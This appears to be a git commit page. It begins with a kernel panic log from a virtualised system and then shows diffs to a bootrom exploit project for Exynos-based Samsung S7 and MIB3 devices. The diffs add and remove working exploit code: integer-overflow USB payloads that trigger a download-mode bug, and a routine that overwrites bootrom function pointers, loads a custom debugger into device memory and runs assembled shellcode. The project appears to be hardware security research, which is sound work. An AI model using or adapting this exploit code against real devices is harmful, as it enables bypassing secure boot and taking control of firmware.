(DU1) [ 54.369668] [ 57.010196] :: <6>[ 43.669140] [ 46.309668] usb 3-1.2: USB disconnect, device number 4
(DU1) [ 54.369684] [ 57.010212] :: <6>[ 43.669151] [ 46.309679] usb 3-1.2.4: USB disconnect, device number 6
(DU1) [ 54.369700] [ 57.010228] :: <6>[ 43.671250] [ 46.311778] usb 3-1.2.5: USB disconnect, device number 7
(DU1) [ 54.369716] [ 57.010244] :: <6>[ 43.674046] [ 46.314574] usb 3-1.5: USB disconnect, device number 5
(DU1) [ 54.369731] [ 57.010259] :: <6>[ 43.674822] [ 46.315350] dabr_udc deleted
(DU1) [ 54.369746] [ 57.010274] :: <6>[ 43.674829] [ 46.315356] dabridge 3-5 deleted
(DU1) [ 54.369760] [ 57.010288] :: <0>[ 48.131373] [ 50.771901] Kernel panic - not syncing: Watchdog detected hard LOCKUP on cpu 0
(DU1) [ 54.369781] [ 57.010309] :: <4>[ 48.131409] [ 50.771937] CPU: 5 MPIDR: 80000003 PID: 0 Comm: swapper/5 Tainted: P W OE 4.4.36 #1
(DU1) [ 54.369802] [ 57.010330] :: <4>[ 48.131430] [ 50.771958] Hardware name: XENVM-4.8 (DT)
(DU1) [ 54.369818] [ 57.010346] :: <0>[ 48.131441] [ 50.771969] Call trace:
(DU1) [ 54.369831] [ 57.010359] :: <0>[ 48.131459] [ 50.771987] [<ffffffc000089878>] dump_backtrace+0x0/0x158
(DU1) [ 54.369848] [ 57.010376] :: <0>[ 48.131476] [ 50.772003] [<ffffffc0000899f4>] show_stack+0x24/0x30
(DU1) [ 54.369864] [ 57.010392] :: <0>[ 48.131493] [ 50.772021] [<ffffffc0004170b0>] dump_stack+0x90/0xb0
(DU1) [ 54.369881] [ 57.010409] :: <0>[ 48.131510] [ 50.772037] [<ffffffc00018805c>] panic+0x100/0x24c
(DU1) [ 54.369897] [ 57.010425] :: <0>[ 48.131525] [ 50.772053] [<ffffffc00014c3e0>] watchdog_timer_fn+0x310/0x3d8
(DU1) [ 54.569404] [ 57.209932] :: <0>[ 48.131543] [ 50.772071] [<ffffffc00010e17c>] __hrtimer_run_queues+0x134/0x328
(DU1) [ 54.569423] [ 57.209950] :: <0>[ 48.131558] [ 50.772086] [<ffffffc00010ea6c>] hrtimer_interrupt+0xb4/0x1e8
(DU1) [ 54.569441] [ 57.209969] :: <0>[ 48.131578] [ 50.772106] [<ffffffc000676d2c>] arch_timer_handler_virt+0x3c/0x50
(DU1) [ 54.569459] [ 57.209987] :: <0>[ 48.131595] [ 50.772123] [<ffffffc0000fc558>] handle_percpu_devid_irq+0xb0/0x210
(DU1) [ 54.569477] [ 57.210005] :: <0>[ 48.131610] [ 50.772138] [<ffffffc0000f7624>] generic_handle_irq+0x34/0x50
(DU1) [ 54.569495] [ 57.210023] :: <0>[ 48.131624] [ 50.772152] [<ffffffc0000f79a8>] __handle_domain_irq+0xa0/0x120
(DU1) [ 54.569512] [ 57.210040] :: <0>[ 48.131639] [ 50.772167] [<ffffffc0000815bc>] gic_handle_irq+0x6c/0xd0
(DU1) [ 54.569529] [ 57.210057] :: <4>[ 48.131652] [ 50.772180] Exception stack(0xffffffc8b1ef7dd0 to 0xffffffc8b1ef7f00)
(DU1) [ 54.569548] [ 57.210075] :: <4>[ 48.131667] [ 50.772195] 7dc0: ffffffc000d4d000 0000008000000000
(DU1) [ 54.569568] [ 57.210096] :: <4>[ 48.131683] [ 50.772211] 7de0: ffffffc8b1ef7f30 ffffffc000085a5c 0000000060000145 ffffffc000c4cb48
(DU1) [ 54.569587] [ 57.210115] :: <4>[ 48.131698] [ 50.772226] 7e00: 0000000000000000 ffffffc000ad7a10 ffffffc8b1ef4000 0000000000000001
(DU1) [ 54.569606] [ 57.210134] :: <4>[ 48.131715] [ 50.772243] 7e20: ffffffc000f5f000 00ffffffffffffff 000000004e87b8f0 0000000b2f42e83f
(DU1) [ 54.569625] [ 57.210153] :: <4>[ 48.131731] [ 50.772259] 7e40: ffffffc8b1ecb100 ffffffc8b1ef7ec0 0000000000000820 000000003ac84e00
(DU1) [ 54.569644] [ 57.210172] :: <4>[ 48.131747] [ 50.772274] 7e60: 0000000000000018 ffffffffab5ac93e 00376ce86d000000 003b9aca00000000
(DU1) [ 54.569663] [ 57.210191] :: <4>[ 48.131763] [ 50.772291] 7e80: ffffffc000122938 0000007f95ddce80 0000000000000230 ffffffc000d4d000
(DU1) [ 54.569683] [ 57.210210] :: <4>[ 48.131877] [ 50.772405] 7ea0: ffffffc000d4d908 0000000000000005 ffffffc0008a7000 ffffffc000d4d000
(DU1) [ 54.764943] [ 57.405471] :: <4>[ 48.131894] [ 50.772422] 7ec0: ffffffc000c4cb48 ffffffc8b1ef7f70 ffffffc000a69000 ffffffc000c5e000
(DU1) [ 54.764966] [ 57.405494] :: <4>[ 48.131912] [ 50.772440] 7ee0: 0000000000000000 ffffffc8b1ef7f30 ffffffc000085a58 ffffffc8b1ef7f30
(DU1) [ 54.764986] [ 57.405514] :: <0>[ 48.131929] [ 50.772457] [<ffffffc0000848bc>] el1_irq+0x7c/0xf4
(DU1) [ 54.765005] [ 57.405533] :: <0>[ 48.131944] [ 50.772472] [<ffffffc0000eb2ac>] default_idle_call+0x24/0x40
(DU1) [ 54.765025] [ 57.405553] :: <0>[ 48.131957] [ 50.772485] [<ffffffc0000eb65c>] cpu_startup_entry+0x31c/0x370
(DU1) [ 54.765043] [ 57.405570] :: <0>[ 48.131972] [ 50.772500] [<ffffffc00008efd0>] secondary_start_kernel+0x148/0x170
(DU1) [ 54.765061] [ 57.405589] :: <0>[ 48.131989] [ 50.772517] [<00000000c108192c>] 0xc108192c
(DU1) [ 54.765076] [ 57.405604] :: <2>[ 48.132039] [ 50.772567] CPU1: stopping
(DU1) [ 54.765091] [ 57.405619] :: <4>[ 48.132075] [ 50.772603] CPU: 1 MPIDR: 80000102 PID: 0 Comm: swapper/1 Tainted: P W OE 4.4.36 #1
(DU1) [ 54.765111] [ 57.405639] :: <4>[ 48.132097] [ 50.772624] Hardware name: XENVM-4.8 (DT)
(DU1) [ 54.765127] [ 57.405655] :: <0>[ 48.132110] [ 50.772638] Call trace:
(DU1) [ 54.765141] [ 57.405669] :: <0>[ 48.132133] [ 50.772660] [<ffffffc000089878>] dump_backtrace+0x0/0x158
(DU1) [ 54.765160] [ 57.405688] :: <0>[ 48.132152] [ 50.772679] [<ffffffc0000899f4>] show_stack+0x24/0x30
(DU1) [ 54.765177] [ 57.405705] :: <0>[ 48.132172] [ 50.772700] [<ffffffc0004170b0>] dump_stack+0x90/0xb0
(DU1) [ 54.765195] [ 57.405723] :: <0>[ 48.132190] [ 50.772718] [<ffffffc00008ed44>] handle_IPI+0x33c/0x348
(DU1) [ 54.765212] [ 57.405740] :: <0>[ 48.132207] [ 50.772735] [<ffffffc000081600>] gic_handle_irq+0xb0/0xd0
(DU1) [ 54.765230] [ 57.405758] :: <4>[ 48.132223] [ 50.772751] Exception stack(0xffffffc8b1edbdd0 to 0xffffffc8b1edbf00)
(DU1) [ 54.765249] [ 57.405777] :: <4>[ 48.132241] [ 50.772769] bdc0: ffffffc000d4d000 0000008000000000
(DU1) [ 54.956759] [ 57.597287] :: <4>[ 48.132262] [ 50.772790] bde0: ffffffc8b1edbf30 ffffffc000085a5c 0000000060000145 ffffffc000c4cb48
(DU1) [ 54.956781] [ 57.597309] :: <4>[ 48.132282] [ 50.772810] be00: 0000000000000000 ffffffc000ad7a10 ffffffc8b1ed8000 0000000000000001
(DU1) [ 54.956802] [ 57.597329] :: <4>[ 48.132302] [ 50.772830] be20: ffffffc000f5f000 00ffffffffffffff 000000004eac38b0 0000000b34c80bc4
(DU1) [ 54.956822] [ 57.597350] :: <4>[ 48.132323] [ 50.772851] be40: ffffffc8b1ec9600 ffffffc8b1edbec0 0000000000000820 0000000008e08316
(DU1) [ 54.956843] [ 57.597371] :: <4>[ 48.132348] [ 50.772876] be60: 0000000000000018 0000000000000000 0000000000000000 0008e0831688c230
(DU1) [ 54.956864] [ 57.597392] :: <4>[ 48.304895] [ 50.945423] be80: ffffffc000122938 0000007f86033be0 0000000000000170 ffffffc000d4d000
(DU1) [ 54.956884] [ 57.597412] :: <4>[ 48.304922] [ 50.945450] bea0: ffffffc000d4d908 0000000000000001 ffffffc0008a7000 ffffffc000d4d000
(DU1) [ 54.956910] [ 57.597438] :: <4>[ 48.304945] [ 50.945473] bec0: ffffffc000c4cb48 ffffffc8b1edbf70 ffffffc000a69000 ffffffc000c5e000
(DU1) [ 54.956929] [ 57.597456] :: <4>[ 48.304967] [ 50.945495] bee0: 0000000000000000 ffffffc8b1edbf30 ffffffc000085a58 ffffffc8b1edbf30
(DU1) [ 54.956948] [ 57.597476] :: <0>[ 48.304996] [ 50.945524] [<ffffffc0000848bc>] el1_irq+0x7c/0xf4
(DU1) [ 54.956965] [ 57.597493] :: <0>[ 48.305017] [ 50.945545] [<ffffffc0000eb2ac>] default_idle_call+0x24/0x40
(DU1) [ 54.956983] [ 57.597511] :: <0>[ 48.305036] [ 50.945563] [<ffffffc0000eb65c>] cpu_startup_entry+0x31c/0x370
(DU1) [ 54.957002] [ 57.597530] :: <0>[ 48.305056] [ 50.945584] [<ffffffc00008efd0>] secondary_start_kernel+0x148/0x170
(DU1) [ 54.957019] [ 57.597547] :: <0>[ 48.305076] [ 50.945604] [<00000000c108192c>] 0xc108192c
(DU1) [ 54.957035] [ 57.597563] :: <2>[ 48.305095] [ 50.945623] CPU2: stopping
(DU1) [ 54.957050] [ 57.597578] :: <4>[ 48.305121] [ 50.945649] CPU: 2 MPIDR: 80000103 PID: 0 Comm: swapper/2 Tainted: P W OE 4.4.36 #1
(DU1) [ 55.156609] [ 57.797137] :: <4>[ 48.305144] [ 50.945672] Hardware name: XENVM-4.8 (DT)
(DU1) [ 55.156625] [ 57.797153] :: <0>[ 48.305158] [ 50.945686] Call trace:
(DU1) [ 55.156638] [ 57.797166] :: <0>[ 48.305174] [ 50.945702] [<ffffffc000089878>] dump_backtrace+0x0/0x158
(DU1) [ 55.156657] [ 57.797185] :: <0>[ 48.305193] [ 50.945721] [<ffffffc0000899f4>] show_stack+0x24/0x30
(DU1) [ 55.156676] [ 57.797203] :: <0>[ 48.305213] [ 50.945741] [<ffffffc0004170b0>] dump_stack+0x90/0xb0
(DU1) [ 55.156694] [ 57.797222] :: <0>[ 48.305231] [ 50.945759] [<ffffffc00008ed44>] handle_IPI+0x33c/0x348
(DU1) [ 55.156710] [ 57.797238] :: <0>[ 48.305249] [ 50.945777] [<ffffffc000081600>] gic_handle_irq+0xb0/0xd0
(DU1) [ 55.156731] [ 57.797259] :: <4>[ 48.305266] [ 50.945794] Exception stack(0xffffffc8b1ee3dd0 to 0xffffffc8b1ee3f00)
(DU1) [ 55.156753] [ 57.797280] :: <4>[ 48.305286] [ 50.945814] 3dc0: ffffffc000d4d000 0000008000000000
(DU1) [ 55.156772] [ 57.797300] :: <4>[ 48.305308] [ 50.945836] 3de0: ffffffc8b1ee3f30 ffffffc000085a5c 0000000060000145 ffffffc000c4cb48
(DU1) [ 55.156791] [ 57.797319] :: <4>[ 48.305332] [ 50.945860] 3e00: 0000000000000000 ffffffc000ad7a10 ffffffc8b1ee0000 0000000000000001
(DU1) [ 55.156810] [ 57.797338] :: <4>[ 48.305354] [ 50.945882] 3e20: ffffffc000f5f000 00ffffffffffffff 000000004eac38b0 0000000b34db7953
(DU1) [ 55.156829] [ 57.797357] :: <4>[ 48.305376] [ 50.945904] 3e40: ffffffc8b1ece700 ffffffc8b1ee3ec0 0000000000000820 ffffffc0008a8598
(DU1) [ 55.156848] [ 57.797376] :: <4>[ 48.508711] [ 51.149239] 3e60: 0000000000000b25 00000000fa83b2da 00376ce86d000000 003b9aca00000000
(DU1) [ 55.156870] [ 57.797398] :: <4>[ 48.508736] [ 51.149264] 3e80: ffffffc000111668 0000007f83891fa0 0000000000000000 ffffffc000d4d000
(DU1) [ 55.156890] [ 57.797418] :: <4>[ 48.508759] [ 51.149287] 3ea0: ffffffc000d4d908 0000000000000002 ffffffc0008a7000 ffffffc000d4d000
(DU1) [ 55.356613] [ 57.997141] :: <4>[ 48.508781] [ 51.149309] 3ec0: ffffffc000c4cb48 ffffffc8b1ee3f70 ffffffc000a69000 ffffffc000c5e000
(DU1) [ 55.356636] [ 57.997163] :: <4>[ 48.508803] [ 51.149331] 3ee0: 0000000000000000 ffffffc8b1ee3f30 ffffffc000085a58 ffffffc8b1ee3f30
(DU1) [ 55.356657] [ 57.997185] :: <0>[ 48.508829] [ 51.149357] [<ffffffc0000848bc>] el1_irq+0x7c/0xf4
(DU1) [ 55.356675] [ 57.997203] :: <0>[ 48.508853] [ 51.149381] [<ffffffc0000eb2ac>] default_idle_call+0x24/0x40
(DU1) [ 55.356696] [ 57.997224] :: <0>[ 48.508873] [ 51.149401] [<ffffffc0000eb65c>] cpu_startup_entry+0x31c/0x370
(DU1) [ 55.356714] [ 57.997242] :: <0>[ 48.508894] [ 51.149422] [<ffffffc00008efd0>] secondary_start_kernel+0x148/0x170
(DU1) [ 55.356734] [ 57.997262] :: <0>[ 48.508914] [ 51.149442] [<00000000c108192c>] 0xc108192c
(DU1) [ 55.356759] [ 57.997287] :: <2>[ 48.508933] [ 51.149461] CPU3: stopping
(DU1) [ 55.356774] [ 57.997302] :: <4>[ 48.508963] [ 51.149491] CPU: 3 MPIDR: 80000001 PID: 0 Comm: swapper/3 Tainted: P W OE 4.4.36 #1
(DU1) [ 55.356794] [ 57.997322] :: <4>[ 48.508983] [ 51.149511] Hardware name: XENVM-4.8 (DT)
(DU1) [ 55.356810] [ 57.997338] :: <0>[ 48.508995] [ 51.149523] Call trace:
(DU1) [ 55.356826] [ 57.997354] :: <0>[ 48.509014] [ 51.149542] [<ffffffc000089878>] dump_backtrace+0x0/0x158
(DU1) [ 55.356844] [ 57.997372] :: <0>[ 48.509031] [ 51.149559] [<ffffffc0000899f4>] show_stack+0x24/0x30
(DU1) [ 55.356860] [ 57.997388] :: <0>[ 48.509049] [ 51.149577] [<ffffffc0004170b0>] dump_stack+0x90/0xb0
(DU1) [ 55.356876] [ 57.997404] :: <0>[ 48.509064] [ 51.149592] [<ffffffc00008ed44>] handle_IPI+0x33c/0x348
(DU1) [ 55.356894] [ 57.997422] :: <0>[ 48.509080] [ 51.149608] [<ffffffc000081600>] gic_handle_irq+0xb0/0xd0
(DU1) [ 55.356913] [ 57.997441] :: <4>[ 48.509094] [ 51.149622] Exception stack(0xffffffc8b1ee7dd0 to 0xffffffc8b1ee7f00)
(DU1) [ 55.356933] [ 57.997460] :: <4>[ 48.509109] [ 51.149637] 7dc0: ffffffc000d4d000 0000008000000000
(DU1) [ 55.541121] [ 58.181649] :: <4>[ 48.509126] [ 51.149654] 7de0: ffffffc8b1ee7f30 ffffffc000085a5c 0000000060000145 ffffffc000c4cb48
(DU1) [ 55.541142] [ 58.181670] :: <4>[ 48.509143] [ 51.149671] 7e00: 0000000000000000 ffffffc000ad7a10 ffffffc8b1ee4000 0000000000000001
(DU1) [ 55.541161] [ 58.181689] :: <4>[ 48.509160] [ 51.149688] 7e20: ffffffc000f5f000 00ffffffffffffff 000000004eac38b0 0000000b34dab75d
(DU1) [ 55.541181] [ 58.181709] :: <4>[ 48.712778] [ 51.353306] 7e40: ffffffc8b1eca380 ffffffc8b1ee7ec0 0000000000000820 ffffffc0008a8598
(DU1) [ 55.541201] [ 58.181729] :: <4>[ 48.712796] [ 51.353323] 7e60: 0000000000121735 00000000eac0c6e6 00376ce86d000000 003b9aca00000000
(DU1) [ 55.541221] [ 58.181749] :: <4>[ 48.712813] [ 51.353341] 7e80: ffffffc000245568 0000007fabd47c50 0000000000000000 ffffffc000d4d000
(DU1) [ 55.541242] [ 58.181770] :: <4>[ 48.712830] [ 51.353357] 7ea0: ffffffc000d4d908 0000000000000003 ffffffc0008a7000 ffffffc000d4d000
(DU1) [ 55.541266] [ 58.181794] :: <4>[ 48.712847] [ 51.353375] 7ec0: ffffffc000c4cb48 ffffffc8b1ee7f70 ffffffc000a69000 ffffffc000c5e000
(DU1) [ 55.541289] [ 58.181817] :: <4>[ 48.712863] [ 51.353391] 7ee0: 0000000000000000 ffffffc8b1ee7f30 ffffffc000085a58 ffffffc8b1ee7f30
(DU1) [ 55.541311] [ 58.181839] :: <0>[ 48.712883] [ 51.353411] [<ffffffc0000848bc>] el1_irq+0x7c/0xf4
(DU1) [ 55.541326] [ 58.181854] :: <0>[ 48.712901] [ 51.353429] [<ffffffc0000eb2ac>] default_idle_call+0x24/0x40
(DU1) [ 55.541344] [ 58.181872] :: <0>[ 48.712916] [ 51.353443] [<ffffffc0000eb65c>] cpu_startup_entry+0x31c/0x370
(DU1) [ 55.541362] [ 58.181890] :: <0>[ 48.712932] [ 51.353460] [<ffffffc00008efd0>] secondary_start_kernel+0x148/0x170
(DU1) [ 55.541379] [ 58.181906] :: <0>[ 48.712948] [ 51.353476] [<00000000c108192c>] 0xc108192c
(DU1) [ 55.541394] [ 58.181922] :: <2>[ 48.712963] [ 51.353491] CPU4: stopping
(DU1) [ 55.541410] [ 58.181938] :: <4>[ 48.712993] [ 51.353521] CPU: 4 MPIDR: 80000002 PID: 0 Comm: swapper/4 Tainted: P W OE 4.4.36 #1
(DU1) [ 55.740706] [ 58.381234] :: <4>[ 48.713013] [ 51.353541] Hardware name: XENVM-4.8 (DT)
(DU1) [ 55.740723] [ 58.381251] :: <0>[ 48.713025] [ 51.353553] Call trace:
(DU1) [ 55.740737] [ 58.381265] :: <0>[ 48.713040] [ 51.353567] [<ffffffc000089878>] dump_backtrace+0x0/0x158
(DU1) [ 55.740755] [ 58.381283] :: <0>[ 48.713054] [ 51.353582] [<ffffffc0000899f4>] show_stack+0x24/0x30
(DU1) [ 55.740772] [ 58.381299] :: <0>[ 48.713071] [ 51.353598] [<ffffffc0004170b0>] dump_stack+0x90/0xb0
(DU1) [ 55.740788] [ 58.381316] :: <0>[ 48.713084] [ 51.353612] [<ffffffc00008ed44>] handle_IPI+0x33c/0x348
(DU1) [ 55.740805] [ 58.381332] :: <0>[ 48.713098] [ 51.353626] [<ffffffc000081600>] gic_handle_irq+0xb0/0xd0
(DU1) [ 55.740822] [ 58.381350] :: <4>[ 48.713111] [ 51.353639] Exception stack(0xffffffc8b1ef3dd0 to 0xffffffc8b1ef3f00)
(DU1) [ 55.740847] [ 58.381374] :: <4>[ 48.713126] [ 51.353654] 3dc0: ffffffc000d4d000 0000008000000000
(DU1) [ 55.740866] [ 58.381394] :: <4>[ 48.713142] [ 51.353670] 3de0: ffffffc8b1ef3f30 ffffffc000085a5c 0000000060000145 ffffffc000c4cb48
(DU1) [ 55.740886] [ 58.381413] :: <4>[ 48.713158] [ 51.353686] 3e00: 0000000000000000 ffffffc000ad7a10 ffffffc8b1ef0000 0000000000000001
(DU1) [ 55.740905] [ 58.381433] :: <4>[ 48.916795] [ 51.557323] 3e20: ffffffc000f5f000 00ffffffffffffff 000000004eac38b0 0000000b34dab69d
(DU1) [ 55.740926] [ 58.381454] :: <4>[ 48.916813] [ 51.557341] 3e40: ffffffc8b1ecd980 ffffffc8b1ef3ec0 0000000000000820 ffffffc0008a8598
(DU1) [ 55.740946] [ 58.381474] :: <4>[ 48.916829] [ 51.557356] 3e60: 0000000000060935 00000000dbfbb796 00376ce86d000000 003b9aca00000000
(DU1) [ 55.740967] [ 58.381495] :: <4>[ 48.916846] [ 51.557374] 3e80: ffffffc000245568 0000007f905dfc50 0000007f85ffa654 ffffffc000d4d000
(DU1) [ 55.740988] [ 58.381516] :: <4>[ 48.916862] [ 51.557390] 3ea0: ffffffc000d4d908 0000000000000004 ffffffc0008a7000 ffffffc000d4d000
(DU1) [ 55.936603] [ 58.577131] :: <4>[ 48.916877] [ 51.557405] 3ec0: ffffffc000c4cb48 ffffffc8b1ef3f70 ffffffc000a69000 ffffffc000c5e000
(DU1) [ 55.936626] [ 58.577153] :: <4>[ 48.916893] [ 51.557421] 3ee0: 0000000000000000 ffffffc8b1ef3f30 ffffffc000085a58 ffffffc8b1ef3f30
(DU1) [ 55.936648] [ 58.577176] :: <0>[ 48.916912] [ 51.557440] [<ffffffc0000848bc>] el1_irq+0x7c/0xf4
(DU1) [ 55.936665] [ 58.577193] :: <0>[ 48.916927] [ 51.557455] [<ffffffc0000eb2ac>] default_idle_call+0x24/0x40
(DU1) [ 55.936685] [ 58.577213] :: <0>[ 48.916941] [ 51.557468] [<ffffffc0000eb65c>] cpu_startup_entry+0x31c/0x370
(DU1) [ 55.936706] [ 58.577234] :: <0>[ 48.916956] [ 51.557484] [<ffffffc00008efd0>] secondary_start_kernel+0x148/0x170
(DU1) [ 55.936723] [ 58.577251] ==== Show logs finished ====
HB-SYS: 2015-01-01 - 12:00:58 - 00000005 - cpu: 31% - load: 0.88 - availmem: 1108MB - usermem: 385MB - temp1: 46.0C - temp2: 44.0C - gpu: 248340/2088

File diff suppressed because it is too large Load Diff

View File

@ -17,4 +17,6 @@ numpy
nbformat==5.10.4
pandas
xvfbwrapper #Required for sphinx drawio
source/ghidra_assistant/ghidra_assistant-0.0.1-py3-none-any.whl
capstone
keystone-engine
qiling

View File

@ -37,7 +37,7 @@
"program": "exploit.py",
"console": "integratedTerminal",
"justMyCode": false,
"args": ["--debugger-boot", "--MIB3"], //, "--MIB3"
"args": ["--debugger-boot", "--target", "MIB3"], //, "--MIB3"
},
{
"name": "Debug current file",

View File

@ -0,0 +1,3 @@
{
//"name": "addr"
}

View File

@ -44,39 +44,6 @@ class S7Exploit(ExynosDevice):
assert(res == 0)
return transferred.value
def test_bug_2(self):
"""Interger overflow in last packet if reamining size is 1."""
transferred = ctypes.c_int()
bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
assert res == 0
payload = b"\xaa" * 0x200
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
assert res == 0
payload = b"\xaa" * 0x200
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
while True:
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
def test_bug(self):
"""Verify bug existence"""
# Start by sending a valid packet
# Integer overflow in the size field
# unk + size + payload + header
payload = p32(0) + p32(0xFDFDE7FF + 0x1000) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
assert (len(payload) == BLOCK_SIZE)
res = self.write(payload, MAX_PAYLOAD_SIZE)
for i in range(200):
print(hex(self.send_empty_transfer()))
print('Bug probably available')
sys.exit(0)
def send_normal_stage(self, payload):
"""Send next boot stage to the device"""
@ -98,7 +65,7 @@ class S7Exploit(ExynosDevice):
bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()
bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
if args.MIB3:
if args.target == "MIB3":
bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read()
bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read()
bl2 = open("../mib3/boot_partitions/bl2_a.bin", "rb").read()
@ -178,9 +145,6 @@ class S7Exploit(ExynosDevice):
return
def setup_concrete_device(self, concrete_device : ConcreteDevice):
#Setup architecture
concrete_device.arch = QL_ARCH.ARM64
@ -312,171 +276,6 @@ class S7Exploit(ExynosDevice):
self.cd.relocate_debugger(g_data_received+alternative_size, entry, storage) #0x20c7000, 0x20c0000, 0x20c4000
def dumb_interact(self, dump_imems=False):
'''
Room for playing around with the debugger on the phone.
'''
self.cd.arch_dbg.state.auto_sync = False
self.cd.arch_dbg.state.auto_sync_special = False
logger.debug('State after setting up initial debugger')
self.cd.arch_dbg.state.print_ctx()
def first_debugger():
debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
self.cd.memwrite_region(0x2069000, debugger)
self.cd.restore_stack_and_jump(0x2069000)
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
self.cd.relocate_debugger(0x206d000 + 0x1000, 0x2069000, 0x206d000)
# self.relocate_debugger()
DEBUGGER_ADDR = 0x2069000 #0x020c0000
### Get whereabouts of the debugger and current processor state
logger.debug('State after relocating debugger')
self.cd.arch_dbg.state.print_ctx()
def memdump_imem():
"""
Dumps the internal memory of the device (0x2020000 - 0x2070000).
"""
dumped = b""
for block in range(0x2020000, 0x2070000, 0x200):
# print(hex(block))
dumped += self.cd.memdump_region(block, 0x200)
return dumped
AUTH_BL1 = 0x00012848 # Location of the authentication function
def auth_bl1(lr=0x2069000):
# Load the firmware
self.cd.arch_dbg.state.X0 = 1
self.cd.arch_dbg.state.X1 = 1
self.cd.arch_dbg.state.LR = lr #jump back to debugger when finished
self.cd.restore_stack_and_jump(AUTH_BL1)
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"
BOOT_BL1 = 0x00019310 # Location of the boot function
def boot_bl1(lr=0x2069000):
self.cd.arch_dbg.state.LR = lr
self.cd.restore_stack_and_jump(BOOT_BL1)
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
JUMP_BL1 = 0x000002c0 # Location of the function to start the BL1 boot
def jump_bl1(lr):
self.cd.arch_dbg.state.LR = lr
self.cd.restore_stack_and_jump(JUMP_BL1)
# Always hijack rom_usb_download function:
rom_usb_download = self.cd.memdump_region(0x020200dc, 4)
self.cd.memwrite_region(0x020200dc, p32(0x2069000))
# Try loading bl1
bl1 = open("../S7/bl1.bin", "rb").read()
self.cd.memwrite_region(0x02021800, bl1)
self.usb_write(b"FLSH") # Flush cache, as Frederic does
self.cd.test_connection()
auth_bl1(DEBUGGER_ADDR)
# boot_bl1(DEBUGGER_ADDR)
self.cd.memwrite_region(0x02022858, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR)) # jump to debugger on next stage download
self.cd.memwrite_region(0x020219cc, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR))
jump_bl1(DEBUGGER_ADDR)
# Returns on usb_download function
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
self.cd.arch_dbg.state.print_ctx()
dl_ready, next_stage = struct.unpack("<II", self.cd.memdump_region(0x02021518, 8))
bl31 = open("../S7/bl31.bin", "rb").read()
self.cd.memwrite_region(0x02024000, bl31)
self.cd.memwrite_region(0x02021518, p32(1)) # Set dl_ready to 1
self.cd.memwrite_region(0x02021518 + 4 , p32(self.cd.arch_dbg.state.X0))
self.cd.arch_dbg.state.X0 = 0
self.cd.restore_stack_and_jump(0x020219c8)
pass
# assert len(bl31) % 0x200 == 0, "Size needs to be 512 bytes aligned"
# self.cd.memwrite_region(self.cd.arch_dbg.state.X0, p32(147456)) # Update amount of blocks
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
# self.cd.restore_stack_and_jump(0x02022a08)
# Patches
# self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
# self.cd.memwrite_region(0x2022948 + 4, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR))
# Patch stupid error function
# self.usb_write(b"FLSH") # Flush cache
# Download next stage?
lr = self.cd.arch_dbg.state.LR
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
pass
# Overwrite jump back to the debugger from functions encountered during jump_bl1
self.cd.memwrite_region(0x020200e8, p32(0x020c0000)) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
self.cd.memwrite_region(0x020200dc, p32(0x020c0000))
def hijack_brom_weird():
print(f"From = {hex(self.cd.arch_dbg.state.LR - 4)} X0 = {hex(self.cd.arch_dbg.state.X0)}")
self.cd.restore_stack_and_jump(0x00000314)
jump_bl1(0x020c0000)
def handle_weird_brom():
while True:
try:
resp = self.usb_read(0x200)
logging.debug(f'Within jump_bl1. Response: {resp}.')
if self.cd.arch_dbg.state.LR == 0x02022948:
break # ROM will load next stage over USB
hijack_brom_weird()
except Exception as e:
pass
handle_weird_brom()
### For getting special registers. Non-writeable registers are detected. (UXN, PXN, etc)
# self.cd.jump_to(0x2069000)
# assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
# self.cd.fetch_special_regs()
self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins)
self.cd.arch_dbg.state.X0 = 1
self.cd.restore_stack_and_jump(self.cd.arch_dbg.state.LR)
self.usb_read(0x200) # GiAs
self.cd.arch_dbg.state.LR = 0x2069000
self.cd.restore_stack_and_jump(0x00000314)
pass
### UXN and PXN seem to be present over the USB stack (02021800+)
shellcode = f"""
ldr x0, debugger_addr
blr x0
debugger_addr: .quad 0x02022000
"""
shellcode = ks.asm(shellcode, as_bytes=True)[0]
self.cd.memwrite_region(0x2021800, shellcode)
self.cd.jump_to(0x2021800)
pass
